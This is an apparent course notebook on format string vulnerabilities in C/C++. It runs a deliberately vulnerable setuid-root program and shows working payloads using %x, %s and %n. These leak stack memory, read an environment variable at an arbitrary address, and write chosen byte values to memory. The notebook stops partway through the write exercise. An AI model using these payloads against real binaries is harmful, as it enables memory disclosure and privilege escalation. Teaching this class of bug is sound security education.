# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ prints fixed strings and variables in many different formats
- other `<cstdio>` functions that use format strings are: `fprintf`, `sprintf`, `scanf`, `fscanf`, `sscanf`
- the hello.cpp program below passes its message directly as the format string, a habit that becomes dangerous once the string is not a literal
- technically, the `"Good bye...!\n"` string is the format string (one devoid of the special escape sequences called format parameters)
- a format parameter begins with a `%` sign; for each format parameter, the function expects a corresponding argument
- a format parameter follows this prototype:
`%[flags][width][.precision][length]specifier`

- the following parameters expect values/variables as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers/addresses as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

- `%s` - reads the data pointed to by the address/pointer provided as an argument
- `%n` is an intriguing parameter: it expects the address of an integer and writes to that address the number of bytes written to standard output so far!
    - what could potentially go wrong here?!!...

- `%s` and `%n` are the focus of this notebook

In [1]:
%pwd

'/home/kali/projects/SoftwareSecurity/notebooks'

In [2]:
%cd ../demos

/home/kali/projects/SoftwareSecurity/demos


In [3]:
%cat hello.cpp

#include <iostream>
#include <cstdio>

using namespace std;

int main(){
    cout << "Hello World!" << endl;
    printf("Good bye...!\n");
    return 0;
}


In [10]:
! g++ -m32 -std=c++20 -o hello.exe hello.cpp

In [9]:
! ./hello.exe

Hello World!
Good bye...!


## Format Parameters Examples
- let's look into fmt_strings.cpp program to see common usage of format strings and parameters

In [7]:
%cd fmt_strings

/home/kali/projects/SoftwareSecurity/demos/fmt_strings


In [8]:
! cat fmt_strings.cpp

#include <cstdio>
#include <cstring>
#include <string>

using namespace std;


int main(int argc, char * argv[]) {
   char c_string[10] = "sample";
   int A = -73;
   unsigned int B = 31337;
   string cpp_string = "Hello from C++";

   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', 8: '%08u'\n", B, B, B);
   printf("[c_string] %s is @ %p\n", c_string, c_string);
   printf("[cpp_string] %s is @ 0x%08x\n", cpp_string.c_str(), &cpp_string);

   // Example of the unary address-of operator (&) and the %p format parameter
   printf("variable A is at address: %p\n", &A);
   return 0;
}

In [9]:
! g++ -m32 -o fmt_strings.exe fmt_strings.cpp

In [10]:
! g++ -m32 -Wall -o fmt_strings.exe fmt_strings.cpp

[01m[Kfmt_strings.cpp:[m[K In function ‘[01m[Kint[01;32m[K main[m[K(int, char**)[m[K’:
   19 |    printf("[cpp_string] %s is @ 0x%08x\n", cpp_string.c_str(), &cpp_string);
      |                                   ~~~^                         ~~~~~~~~~~~
      |                                      |                         |
      |                                      unsigned int              std::string* {aka std::__cxx11::basic_string<char>*}


In [14]:
! cp ../../demos/compile.sh .

In [16]:
%%bash
input="fmt_strings.cpp"
output=fmt_strings.exe
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: fmt_strings.cpp: In function ‘int main(int, char**)’:
   19 |    printf("[cpp_string] %s is @ 0x%08x\n", cpp_string.c_str(), &cpp_string);
      |                                   ~~~^                         ~~~~~~~~~~~
      |                                      |                         |
      |                                      unsigned int              std::string* {aka std::__cxx11::basic_string<char>*}
   22 |    printf("variable A is at address: %p\n", &A);
      |                                      ~^     ~~
      |                                       |     |
      |                                       void* int*
      |                                      %n
    8 | int main(int argc, char * argv[]) {
      |          ~~~~^~~~
    8 | int main(int argc, char * argv[]) {
      |                    ~~~~~~~^~~~~~


In [17]:
# note the large unsigned value for A: a negative value is stored in two's complement
! ./fmt_strings.exe

[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', 8: '00031337'
[c_string] sample is @ 0xffffbcfd
[cpp_string] Hello from C++ is @ 0xffffbce0
variable A is at address: 0xffffbcf8
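
The large unsigned value printed for A can be reproduced with a short Python sketch. It assumes a 32-bit `int`, as in the `-m32` build above; the helper name `as_unsigned32` is made up for illustration.

```python
def as_unsigned32(value):
    """Reinterpret a signed 32-bit integer as unsigned (two's complement)."""
    return value & 0xFFFFFFFF


A = -73
print(as_unsigned32(A))               # what %u shows for A
print(format(as_unsigned32(A), "x"))  # what %x shows for A
```

The two printed values are 4294967223 and ffffffb7, the same as in the `[A]` line of the program output.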


## Format Parameter `%n`

- `%n` - uncommon, but let's understand how it works
- `%n` - takes pointer argument; writes the number of bytes written so far to the corresponding variable's address

In [18]:
cat fmt_uncommon.cpp


#include <cstdio>
#include <cstdlib>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack Example
   printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

   return 0;
}

In [19]:
%%bash
input="fmt_uncommon.cpp"
output=fmt_uncommon.exe
echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: fmt_uncommon.cpp: In function ‘int main()’:
   15 |    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
      |                              ~~~^                   ~~
      |                                 |                   |
      |                                 unsigned int        int*
      |                              %08n


In [20]:
! ./fmt_uncommon.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffbd18.  B is 7.
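
The two counts can be checked without running the C++ program. The sketch below is only a model of what `%n` records: it splits the same format string at each `%n` and adds up the bytes that precede it. The function name `percent_n_counts` is hypothetical, and the model assumes the string contains no other format parameters.

```python
fmt = ("The number of bytes written up to this point X%n is being stored in "
       "count_one, and the number of bytes up to here X%n is being stored in "
       "count_two.\n")


def percent_n_counts(fmt):
    """Return the byte count that each %n in fmt would store."""
    counts = []
    written = 0
    pieces = fmt.split("%n")
    # every piece except the last one is followed by a %n
    for piece in pieces[:-1]:
        written += len(piece.encode())
        counts.append(written)
    return counts


print(percent_n_counts(fmt))
```

The list printed is `[46, 113]`, matching count_one and count_two above.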


### Stack frame of printf( )
- let's look just before the printf() is called in fmt_uncommon.cpp
- look at the last printf()

#### printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
- hint: arguments are pushed in reverse order (last argument first)


|Top of the stack|
| :----: |
| local variable |
| EBP of main |
| return address to main |
| Address of format string (first argument)|
| Value of A |
| Address of A |
| Value of B |
| ... |
| Stack frame of main |
| Bottom of the Stack |

### what if?
- what happens if fewer arguments are passed to printf() than the format string has parameters?
    - what kind of error happens: syntax error? logical error? run-time error?
- e.g.: `printf("A is %d and is at %08x. B is %x.\n", A, &A);`
    - no argument is provided for the last `%x` parameter
- fmt_uncommon2.cpp in demos/fmt_strings/ demonstrates just this
- fmt_uncommon2.cpp is essentially the same as fmt_uncommon.cpp except for one line

In [21]:
# see the difference between the fmt_uncommon.cpp and fmt_uncommon2.cpp
! diff fmt_uncommon.cpp fmt_uncommon2.cpp

15c15
<    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
---
>    printf("A is %d and is at %08x.  B is %x.\n", A, &A);


In [22]:
%%bash
# let's compile the fmt_uncommon2.cpp file
input=fmt_uncommon2.cpp
output=fmt_uncommon2.exe

echo kali | sudo -S ./compile.sh $input $output

[sudo] password for kali: fmt_uncommon2.cpp: In function ‘int main()’:
   15 |    printf("A is %d and is at %08x.  B is %x.\n", A, &A);
      |                              ~~~^                   ~~
      |                                 |                   |
      |                                 unsigned int        int*
      |                              %08n
   15 |    printf("A is %d and is at %08x.  B is %x.\n", A, &A);
      |                                          ~^
      |                                           |
      |                                           unsigned int
    6 |    int A = 5, B = 7, count_one, count_two;
      |               ^


In [24]:
# execute the program
! ./fmt_uncommon2.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffbd18.  B is 804917d.


### Note the value of B
- Is that the correct value of B? So, what happened?
- since there's no corresponding argument for the third `%x`, printf() pulled whatever value was stored in the location where the third argument was supposed to be on the stack
- this value sits just past the arguments that were actually pushed, i.e., in the caller's part of the stack
- as a result, the program read data from memory that it was not supposed to read
    - a violation of the confidentiality of the program's data
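
A rough Python model of this behaviour, not the way printf() is actually implemented: every format parameter simply consumes the next 32-bit word on the stack, whether or not the caller pushed one. The names `simulated_printf` and `stack_words` are hypothetical, and the stack values are copied from the run above.

```python
import re

# Matches only the simple conversions used in fmt_uncommon2.cpp: %d, %x, %08x
SPEC = re.compile(r"%(0?)(\d*)([dx])")


def simulated_printf(fmt, stack_words):
    """Fill each format parameter with the next 32-bit word from stack_words."""
    words = iter(stack_words)

    def convert(match):
        zero, width, conv = match.groups()
        word = next(words) & 0xFFFFFFFF
        if conv == "d":
            # interpret the word as a signed 32-bit integer
            text = str(word - 0x100000000 if word >= 0x80000000 else word)
        else:
            text = format(word, "x")
        return text.rjust(int(width or 0), "0" if zero else " ")

    return SPEC.sub(convert, fmt)


# The caller pushed only A and &A; the third word is whatever happened to
# sit next on the stack (value taken from the run above).
stack_words = [5, 0xFFFFBD18, 0x0804917D]
line = simulated_printf("A is %d and is at %08x.  B is %x.\n", stack_words)
print(line, end="")
```

The model prints the same line as fmt_uncommon2.exe: the third `%x` shows 804917d, a value the caller never passed.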

## The Format String Vulnerability
- the vulnerability arises when a string variable is passed directly as the format string, `printf(string)`, instead of as an argument, `printf("%s", string)`
    - it is exploitable when the value of the string can't be trusted; usually it is user-provided or received externally from another program, network, file, etc.
- let's demonstrate the format string vulnerability using `fmt_vuln.cpp` program in `demos/fmt_strings/vuln1/` folder

In [25]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/fmt_strings


In [26]:
# change working directory to vuln1 folder
%cd vuln1

/home/kali/projects/SoftwareSecurity/demos/fmt_strings/vuln1


In [27]:
! pwd

/home/kali/projects/SoftwareSecurity/demos/fmt_strings/vuln1


In [28]:
! ls -al

total 64
drwxr-xr-x 2 kali kali  4096 Apr 16 00:39 .
drwxr-xr-x 3 kali kali  4096 Apr 23 14:53 ..
-rw-r--r-- 1 kali kali   100 May  3  2024 exploit_fmt.bin
-rw-r--r-- 1 kali kali   610 May  3  2024 fmt_vuln.cpp
-rwsr-xr-x 1 root root 21484 Apr 16 00:39 fmt_vuln.exe
-rw-r--r-- 1 root root 10524 Apr 16 00:39 fmt_vuln.o
-rw-r--r-- 1 kali kali   500 May  3  2024 getenvaddr.cpp
-rw-r--r-- 1 kali kali   870 May  3  2024 Makefile
-rw-r--r-- 1 kali kali    35 May  3  2024 shellcode_root.bin


In [29]:
! cat fmt_vuln.cpp

#include <cstdio>
#include <cstdlib>
#include <cstring>

int main(int argc, char *argv[]) {

   static int test_val = -72;
   char text[1024];
   
   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }

   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\n\nThe wrong way to print user-controlled input:\n");
   printf(text);
   printf("\n\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
   printf("[*] text is @ %p\n", &text);
   exit(0);
}


In [27]:
# let's compile the file using the provided Makefile
! echo kali | sudo -S make

[sudo] password for kali: # disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
# compiles .cpp to object file .o
g++ -c -g -Wall -std=c++17 -m32 fmt_vuln.cpp
[01m[Kfmt_vuln.cpp:[m[K In function ‘[01m[Kint[01;32m[K main[m[K(int, char**)[m[K’:
   25 |    printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
      |                             ~~~^                 ~~~~~~~~~
      |                                |                 |
      |                                unsigned int      int*
      |                             %08n
# builds executable from object files
g++ -m32 -fno-stack-protector -z execstack -no-pie -o fmt_vuln.exe *.o
sudo chown root:root fmt_vuln.exe
sudo chmod u+s fmt_vuln.exe


In [28]:
# make sure ownership is changed to root and the setuid bit (the s in rws) is set
! ls -al fmt_vuln.exe

-rwsr-xr-x 1 root root 21484 Apr 16 00:39 fmt_vuln.exe


In [29]:
# run fmt_vuln.exe
! ./fmt_vuln.exe

Usage: ./fmt_vuln.exe <text to print>


In [30]:
! ./fmt_vuln.exe "testing 124 abc #\$$556"
# Note $ has special meaning to printf() function; you'll see the usage below

The right way to print user-controlled input:
testing 124 abc #$556

The wrong way to print user-controlled input:
testing 124 abc #$556

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb900


In [31]:
# what if you provide %s as value
! ./fmt_vuln.exe "testing%s"
# notice the repeating of the argument itself!

The right way to print user-controlled input:
testing%s

The wrong way to print user-controlled input:
testingtesting%s

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb910


## Control the Input String
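- the `%s` in the input made printf() print the input string itself: the first value it picked up from the stack happens to be the address of `text`
- if `%s` is forced to read a string from an arbitrary or invalid address, the program can crash!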

In [24]:
# start with a single %x to see the first value printf() reads from the stack
# then try adding one %s at a time until the program crashes!
! ./fmt_vuln.exe "AAAA%x"

The right way to print user-controlled input:
AAAA%x

The wrong way to print user-controlled input:
AAAAffffb940

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb940


In [25]:
# when program crashes, the vulnerable printf() function 
# chokes and doesn't print anything
! ./fmt_vuln.exe "AAAA%s%s"

The right way to print user-controlled input:
AAAA%s%s

The wrong way to print user-controlled input:


In [26]:
# let's check if it crashes now
! ./fmt_vuln.exe "AAAA%s%s%s"

The right way to print user-controlled input:
AAAA%s%s%s

The wrong way to print user-controlled input:


In [27]:
# let's check if it crashes now
! ./fmt_vuln.exe "AAAA%s%s%s%s"

The right way to print user-controlled input:
AAAA%s%s%s%s

The wrong way to print user-controlled input:


In [28]:
# you can speed things up...
! ./fmt_vuln.exe $(python -c 'print("AAAA%s."*50)')
# the rest of the output is not printed due to run-time exception

The right way to print user-controlled input:
AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.AAAA%s.

The wrong way to print user-controlled input:


### Let's Use %x Parameter
- recall, `%x` parameter formats the argument in Hex
- what if you provide `%x` as part of data?

In [32]:
! ./fmt_vuln.exe AAAA%x%x%x%x%x
# note the address of text...

The right way to print user-controlled input:
AAAA%x%x%x%x%x

The wrong way to print user-controlled input:
AAAAffffb930ffffffff80491b04141414178257825

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [33]:
# the process can be repeated to examine stack memory further down, at higher addresses
# just provide a lot of %08x format parameters and see what's on the stack
! ./fmt_vuln.exe $(python -c 'print("AAAA" + "%08x."*40, end="")')
# Note: as more data is passed to the program, text address shifts

The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.

The wrong way to print user-controlled input:
AAAAffffb870.ffffffff.080491b0.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb870


In [34]:
# notice that the byte pattern 2e78383025 (25 30 38 78 2e reversed) keeps repeating
# each four-byte value is printed with its bytes reversed due to the little-endian architecture
! python -c 'print("\x25\x30\x38\x78\x2e")'

%08x.
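
To see that the repeating words are the format string itself, the hex values from the output above can be packed back into bytes in little-endian order. This is a small sketch using Python's standard `struct` module; the list `words` holds the 4th through 9th values printed by the vulnerable printf().

```python
import struct

# 4th to 9th values from the "wrong way" output above
words = [0x41414141, 0x78383025, 0x3830252E, 0x30252E78, 0x252E7838, 0x2E783830]

# "<I" packs each value as a 4-byte little-endian unsigned integer,
# which restores the byte order the data had in memory
raw = b"".join(struct.pack("<I", word) for word in words)
print(raw.decode("ascii"))
```

The result is `AAAA%08x.%08x.%08x.%08x.`, i.e., the start of the `text` buffer that printf() is reading back off the stack.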


In [35]:
# try to print the same output as string
! ./fmt_vuln.exe $(python -c 'print("%s."*40)')
# the program crashes...

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.

The wrong way to print user-controlled input:


## Read from Arbitrary Memory Address
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the `%s` format parameter
- if a valid memory address is used, this process could be used to read a string found at that memory address

### Environment variables are loaded into each program's memory
- we'll use demos/stack_overflow/getenvaddr.cpp to get address of an env variable
- use the PATH variable's address as an argument for `%s`
    - essentially force the program to print the value of PATH variable
```bash
$ ./fmt_vuln.exe $(printf "\x address in reverse bytes")%08x-%08x-%08x-%s
```

In [50]:
# provide a bunch of %08x as a part of string to see where the first string repeats
! ./fmt_vuln.exe AAAABBBB-%08x-%08x-%08x-%08x-%08x
# notice that the fourth parameter reads back the beginning of the format string
# AAAA (0x41414141) is the 4th parameter

The right way to print user-controlled input:
AAAABBBB-%08x-%08x-%08x-%08x-%08x

The wrong way to print user-controlled input:
AAAABBBB-ffffb920-ffffffff-080491b0-41414141-42424242

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb920


In [51]:
# confirm that the 4th parameter is AAAA; then try replacing the last %x with %s
! ./fmt_vuln.exe AAAA%08x-%08x-%08x-%x

The right way to print user-controlled input:
AAAA%08x-%08x-%08x-%x

The wrong way to print user-controlled input:
AAAAffffb930-ffffffff-080491b0-41414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


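- replace the last `%x` with `%s` in the command above and the program segfaults; why?
- printf() attempts to print the string at the address 0x41414141 (AAAA), which is not a valid address
- recall that `%s` needs the address of a C string as its argument
- how about we provide some valid memory address instead of AAAA?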

In [43]:
! env | grep "^PATH="

PATH=/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games


In [44]:
# let's copy getenvaddr.cpp file into the current folder
! cp ../../../demos/stack_overflow/getenvaddr.cpp .

In [45]:
! ls -al

total 64
drwxr-xr-x 2 kali kali  4096 Sep 13 13:21 .
drwxr-xr-x 3 kali kali  4096 Sep 11 13:07 ..
-rw-r--r-- 1 kali kali   100 Sep 11 13:07 exploit_fmt.bin
-rw-r--r-- 1 kali kali   610 Sep 11 13:07 fmt_vuln.cpp
-rwsr-xr-x 1 root root 21412 Sep 13 13:21 fmt_vuln.exe
-rw-r--r-- 1 root root 10384 Sep 13 13:21 fmt_vuln.o
-rw-r--r-- 1 kali kali   500 Sep 15 13:03 getenvaddr.cpp
-rw-r--r-- 1 kali kali   870 Sep 11 13:07 Makefile
-rw-r--r-- 1 kali kali    35 Sep 11 13:07 shellcode_root.bin


In [46]:
# we'll compile and run getenvaddr.cpp to find the memory
# address of env variables with respect to a target program
! cat getenvaddr.cpp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char *ptr;

    if(argc < 3) {
        printf("Usage: %s <env variable name> <target program name>\n", argv[0]);
    }
    else {
        ptr = getenv(argv[1]); /* get env var location */
        int diff = (strlen(argv[0]) - strlen(argv[2]))*2;
        ptr += diff; /* adjust for program name */
        printf("%s will be at %p with reference to %s\n", argv[1], ptr, argv[2]);
    }
    return 0;
}


In [47]:
%%bash
input="getenvaddr.cpp"
output="getenvaddr.exe"
g++ -m32 -o $output $input

In [48]:
# find address of PATH variable wrt fmt_vuln.exe
! ./getenvaddr.exe PATH ./fmt_vuln.exe

PATH will be at 0xffffc285 with reference to ./fmt_vuln.exe
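
The adjustment made by getenvaddr.cpp is plain arithmetic: it shifts the address returned by `getenv()` by twice the difference between the two program-name lengths. The sketch below repeats that calculation in Python. The function name `adjusted_env_address` is hypothetical, and the raw address 0xffffc281 is not printed anywhere above; it is back-computed from the reported 0xffffc285 and the name lengths.

```python
def adjusted_env_address(getenv_address, helper_name, target_name):
    """Mirror the arithmetic in getenvaddr.cpp."""
    # same rule as the C++ code: two bytes per character of name-length difference
    diff = (len(helper_name) - len(target_name)) * 2
    return getenv_address + diff


# "./getenvaddr.exe" has 16 characters, "./fmt_vuln.exe" has 14, so diff is 4
predicted = adjusted_env_address(0xFFFFC281, "./getenvaddr.exe", "./fmt_vuln.exe")
print(hex(predicted))
```

A longer target name gives a negative difference and therefore a lower predicted address.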


In [52]:
# let's try to read the value of PATH using fmt_vuln.exe
! ./fmt_vuln.exe $(printf "\x85\xc2\xff\xff")%08x-%08x-%08x-%s

The right way to print user-controlled input:
����%08x-%08x-%08x-%s

The wrong way to print user-controlled input:
����ffffb930-ffffffff-080491b0-/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [53]:
# you can use python to change the byte order
# so you don't have to write the bytes in reverse order in hex format
! python -c 'import sys; sys.stdout.buffer.write((0xffffc285).to_bytes(4, byteorder="little"))'

����

In [54]:
# let's try to read the value of PATH using fmt_vuln.exe using python
! ./fmt_vuln.exe $(python -c 'import sys; sys.stdout.buffer.write((0xffffc285).to_bytes(4, byteorder="little"))')%08x-%08x-%08x-%s

The right way to print user-controlled input:
����%08x-%08x-%08x-%s

The wrong way to print user-controlled input:
����ffffb930-ffffffff-080491b0-/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


### Notice that the variable name `PATH=` is missing from the printed value
- getenvaddr.cpp reports the address of the value, which starts 5 bytes past the beginning of the `PATH=...` entry
- to print the name as well, we can subtract the number of missing characters, i.e., reduce the PATH address by 5 bytes

In [55]:
# can subtract from the complete address
! printf "%x" $((0xffffc285-5))

ffffc280

In [56]:
# or just subtract from the least significant byte
# using Python
print("{:x}".format(0x85-5))

80


In [57]:
! ./fmt_vuln.exe $(python -c 'import sys; sys.stdout.buffer.write((0xffffc280).to_bytes(4, byteorder="little"))')%08x-%08x-%08x-%s
# now we see our complete path

The right way to print user-controlled input:
����%08x-%08x-%08x-%s

The wrong way to print user-controlled input:
����ffffb930-ffffffff-080491b0-PATH=/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


## Write to Arbitrary Memory Address
- `%s` - can be used to read an arbitrary memory address as string
- `%x` - can be used to read values off the stack as Hex
- `%n` - can be used to write to arbitrary memory address
- note that `test_val` variable has been printing its address and value in the debug statement
- what if we provide the address of test_val for our `%n` parameter?

```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%08x-%08x-%08x-%n
```

- however, the resulting value in the `test_val` variable depends on the number of bytes written before the `%n`
- this can be controlled to a greater degree by manipulating the field **WIDTH** option, so we don't have to type a large number of actual characters to write something more meaningful, such as a memory address, to `test_val`

```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%x-%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%100x-%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%400x-%n
```

In [61]:
# let's note the address of test_val
! ./fmt_vuln.exe AAAA%x%x%x%x

The right way to print user-controlled input:
AAAA%x%x%x%x

The wrong way to print user-controlled input:
AAAAffffb930ffffffff80491b041414141

[*] test_val @ 0x0804c01c = -72 0xffffffb8
[*] text is @ 0xffffb930


In [62]:
# use the address of test_val to write to for %n parameter
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%08x-%08x-%08x-%n
# Note test_val: which is the total bytes written thus far by printf()

The right way to print user-controlled input:
�-%08x-%08x-%08x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff-080491b0-

[*] test_val @ 0x0804c01c = 32 0x00000020
[*] text is @ 0xffffb930


In [63]:
# value can be controlled by manipulating the field width of arguments before it
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%x-%x-%n

The right way to print user-controlled input:
�-%x-%x-%x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff-80491b0-

[*] test_val @ 0x0804c01c = 31 0x0000001f
[*] text is @ 0xffffb930


In [64]:
# value can be controlled by manipulating the field width of arguments before it
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%x-%100x-%n

The right way to print user-controlled input:
�-%x-%x-%100x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff-                                                                                             80491b0-

[*] test_val @ 0x0804c01c = 124 0x0000007c
[*] text is @ 0xffffb930


In [66]:
# value can be controlled by manipulating the field width of arguments before it
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%284x-%400x-%n

The right way to print user-controlled input:
�-%x-%284x-%400x-%n

The wrong way to print user-controlled input:
�-ffffb930-                                                                                                                                                                                                                                                                                    ffffffff-                                                                                                                                                                                                                                                                                                                                                                                                         80491b0-

[*] test_val @ 0x0804c01c = 700 0x000002bc
[*] text is @ 0xffffb930


## Write User-Controlled Values (0xaddress)
- the above trick (manipulating width) works for small numbers but won't work for large ones like memory addresses
- let's write 0xDDCCBBAA to variable test_val
- 0xAA goes to least significant byte, 0xBB to next byte and so on and 0xDD goes to the most significant byte
- $\text{0xAA} \rightarrow 1^{st}\ \text{byte}$
- $\text{0xBB} \rightarrow 2^{nd}\ \text{byte}$
- $\text{0xCC} \rightarrow 3^{rd}\ \text{byte}$
- $\text{0xDD} \rightarrow 4^{th}\ \text{byte}$

| Memory address | Value |
| --- | --- |
| 0x0804c01c | AA |
| 0x0804c01d | BB |
| 0x0804c01e | CC |
| 0x0804c01f | DD |

In [67]:
# find out the width value needed to write 0xaa to the right location
# a width of 8 is used to standardize the output (8 hex characters, 4 bytes);
# a width smaller than the number of digits is ignored by printf()
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%x-%8x-%n

The right way to print user-controlled input:
�-%x-%x-%8x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff- 80491b0-

[*] test_val @ 0x0804c01c = 32 0x00000020
[*] text is @ 0xffffb930


In [69]:
# 0xaa is the goal; 32 is what 8 width provides
! printf "%d" $(( 0xaa - 32+8))

146

In [70]:
# or use python
print(0xaa-32+8)

146


In [71]:
# replace width 8 with the resulting value
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08")-%x-%x-%146x-%n
# test_val = 0x000000aa
# the least significant byte, 0xaa, is now in the right place

The right way to print user-controlled input:
�-%x-%x-%146x-%n

The wrong way to print user-controlled input:
�-ffffb930-ffffffff-                                                                                                                                           80491b0-

[*] test_val @ 0x0804c01c = 170 0x000000aa
[*] text is @ 0xffffb930


In [72]:
# next write 0xbb, 0xcc, and 0xdd
# need 3 more %x%n pairs, one for each remaining byte address
# each extra %x consumes a 4-byte word from the stack, so put any 4 bytes, such as JUNK, between the addresses
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%8x%n

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%8x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb920-ffffffff- 80491b0

[*] test_val @ 0x0804c01c = 55 0x00000037
[*] text is @ 0xffffb920


In [73]:
# find the width to be used so the final value is 0xaa
! echo $(( 0xaa-55+8 ))

123


In [74]:
# replace width 8 with the result to write 0xaa
! ./fmt_vuln.exe $(printf "\x1c\xc0\x04\x08JUNK\x1d\xc0\x04\x08JUNK\x1e\xc0\x04\x08JUNK\x1f\xc0\x04\x08")-%x-%x-%123x%n

The right way to print user-controlled input:
�JUNK�JUNK�JUNK�-%x-%x-%123x%n

The wrong way to print user-controlled input:
�JUNK�JUNK�JUNK�-ffffb910-ffffffff-                                                                                                                    80491b0

[*] test_val @ 0x0804c01c = 170 0x000000aa
[*] text is @ 0xffffb910


In [75]:
# next need to write 0xbb in 2nd byte
print(0xbb - 0xaa)

17


In [76]:
# now write 0xbb in correct address
